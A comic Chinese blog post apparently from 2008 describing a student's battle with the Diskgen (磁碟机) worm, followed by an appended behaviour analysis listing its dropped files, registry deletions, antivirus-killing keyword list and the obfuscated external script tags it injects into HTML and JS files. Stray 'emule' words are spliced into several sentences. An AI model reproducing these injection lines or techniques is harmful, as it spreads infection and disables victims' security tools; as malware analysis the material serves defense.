走過的風景

本来想写标题“危命的复活”，后来敲出“未名”，算了，就莫名吧。
这会儿风是沉痛痛滴，偶顶双桃儿眼，就因为昨晚与某大牌大战四个回合，直到电尽人乏

emule是什么，精疲力竭。战斗持续三小时，到凌晨两点，其中包括洗漱和洗衣服的半小时。NND，事实上之前偶就与这家伙交过手，最后是采取迂回战术，重装系统绕了过去。
这回就是冤家路窄狭路相逢，考，偶非要手起刀落亲手灭了乃小样。
先交待背景，寒假前偶在某打印店（就不点名了，以免被人说是扒灰的）认得一群寄居生物，在偶拔下U盘的时候心里清楚肯定有调皮的看偶这里生活条件8错就跟回来鸟，当时偶自恃家中防御健全，口粮丰富，再加上整天与期末论文打情骂俏，也没多在意。后来才发现事态严重。这家伙在偶的本本里筑起坚固的巢穴，繁衍能力一反雪灾的颓势，不但子嗣茂盛，并且还像奈落一样发展出数个威力强大的分身，恰如神乐、神无、白童子之流。王权岌岌可危。无奈偶的同情心草长莺飞，愣是养了他们一整个寒假。开学时候本想劝降招安，谁料想他们是非一般的顽固。偶怒鸟。拍案狂删注册表，打算断鸟他们的粮草。后来不小心把整国的粮草都掐鸟，系统crash down，so重装。嗯，前世恩怨就是这么滴曲折跌宕。
狡猾！这家伙转世投胎在偶滴MP3里（考，现在看到“转世”两个字就想起弥勒，敦煌后遗症）。偶8用MP3好多个月鸟，再插上也只是充充电啥滴，根本忘记那个冤魂，更8用提格式化。好吧，94这一刹那的疏忽verycd版的emule，就决战紫禁之巅鸟。
讲到现在，都没提到偶对手的名讳。考，人家是蒙面大侠嘛，人在暗偶在明，偶怎么可能晓得！8过再丑也总是要现身滴，偶抿口茶，接着讲（妈呀，偶丰富滴lenovo能力又指向老爹您的某个梦境，就是误操作的那个）。
话说根据战帖时间地点是3月11日23:00某楼504#靠窗（偶觉得那里好放冤魂进出）。当偶打开电脑时候Q币网页还肆无忌惮间或弹出，瑞星监控早就被劫持鸟，卡卡也被屏蔽。下载别的杀毒软件如诺顿、金山、江民，只要能唤出名字滴，不但启动不鸟，连解压都瞬间瓦解。桌面上几个程序如maze、emule图标分辨率降低，看上去几个月没洗脸的样子。偶一面和alex大师探讨内功心法，一面在任务管理器里死去活来。经过侦查与反侦查你来我往，偶大致晓得这家伙的卑劣行径，在启动项发现~.exe，优化大师失语。并且.exe和磁盘驱动器是不要想不要碰鸟，除非你想帮助他们生殖。这是第一回合。
第二回合，偶辗转求助在线杀毒，寄希望于active控件出淤泥不染。在这里偶要表扬一下百度童鞋，真是大神啊大神~~~~经过百度杀毒和百度安全中心的过滤，偶找出了几个内奸。其中重要的结论是恶意软件中的fakelsass，让偶晓得了一直捣乱的进程。而关键突破在于启动项。安全中心分析了一个恶意一个未知。恶意那个偶没注意就给清除鸟emule电驴下载，恐怖滴是那个未知，分析不出，清除不掉。偶被搞毛了，才想起来去看来源。dnsq.dll，事后证明这是对手的重要分身。
第三回合真是让人唏嘘——难道这94传说中滴人工智能咩？偶问百度童鞋dnsq.dll是个啥木东东，他竟然强大到把百度给赶走鸟。只要是以此为关键词的webpages通通出错、空白、调试。！！！！！！！！偶火大了~~~~还好alex大师传鸟个专杀的工具包给偶，也布置好战术安排，此时偶才晓得对手是今年异军突起的黑马杀手磁碟机童鞋新变种Worm.Win32.Diskgen.gen。大家好奇的话可以去问问百度童鞋。
虽然有专杀，以偶的经验，.rar也是易感群体。于是在第四回合里偶先在百度安全中心作了个一键恢复，把恶意插件处理鸟迅速重启。断开网络等开机，解压专杀，开始查毒。此间偶去洗脸洗衣服，回来发现内存有24个病毒，文件中86个。本来下一步应当是重启再杀，天煞的，电源警报响了~~~~~~考，偶泪奔~~~~

前篇结束，恶战今晚继续，请关注下集。

附录：
百晓生兵器谱对磁碟机童鞋的记载
作者：清新阳光 日期：2008年1月1日 ( http://hi.baidu.com/newcenturysun)

由于磁碟机家族生殖能力超凡emule project，此贴涉及是偶遇到对手的祖祖辈鸟，偶小作更新。

1.病毒运行后，生成如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe
或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面
netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>
dnsq.dll会插入一些进程

emule.exe，并监控C:\WINDOWS\system32\Com\LSASS.EXE，如果该进程被结束，则立即恢复。而且会监控~.exe，如果该文件被删除，立即重写。
894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动，该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf
右键被伪装，即不论你是通过双击盘符或者右键打开都是一样的激活病毒。

2.通过查找窗口文字和和获得窗口线程进程ID等函数（GetWindowThreadProcessID）监控指定文字的窗口，之后会发送消息关闭窗口或者通过Terminate process函数结束进程，可能涉及的关键字如下：
avast firewall 狙剑 bitdefender escan ewido *升级 sreng 介绍 monitor 微点 费尔 antivir 金山 360anti 360safe avg dr.web 云 墙 升 瑞 mcagent
最终的结果是很多安全工具和杀毒软件不能使用，包括我们常用的Xdelbox，sreng，Icesword以及Icesword修改版...
能叫出名字的杀毒软件都被屏蔽emule vista，360安全卫士更是直接被删。属于瞬秒型病毒。

3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts
C:\boot.ini不能写则Xdelbox等软件被废掉。

4.破坏安全模式
删除如下键
HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer（和安全模式有关？）
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
进入不了安全模式

5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键

6.破坏显示隐藏文件
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0x00000000
无法显示隐藏文件

7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件
仅仅重装系统亦是无法根除

8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*"></script>的代码
感染js等脚本文件
在其尾部加入document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*'></sCrIpT>");的代码
篡改首页，有肮脏网页不时跳出

收藏到：Del.icio.us>>>QQ470681378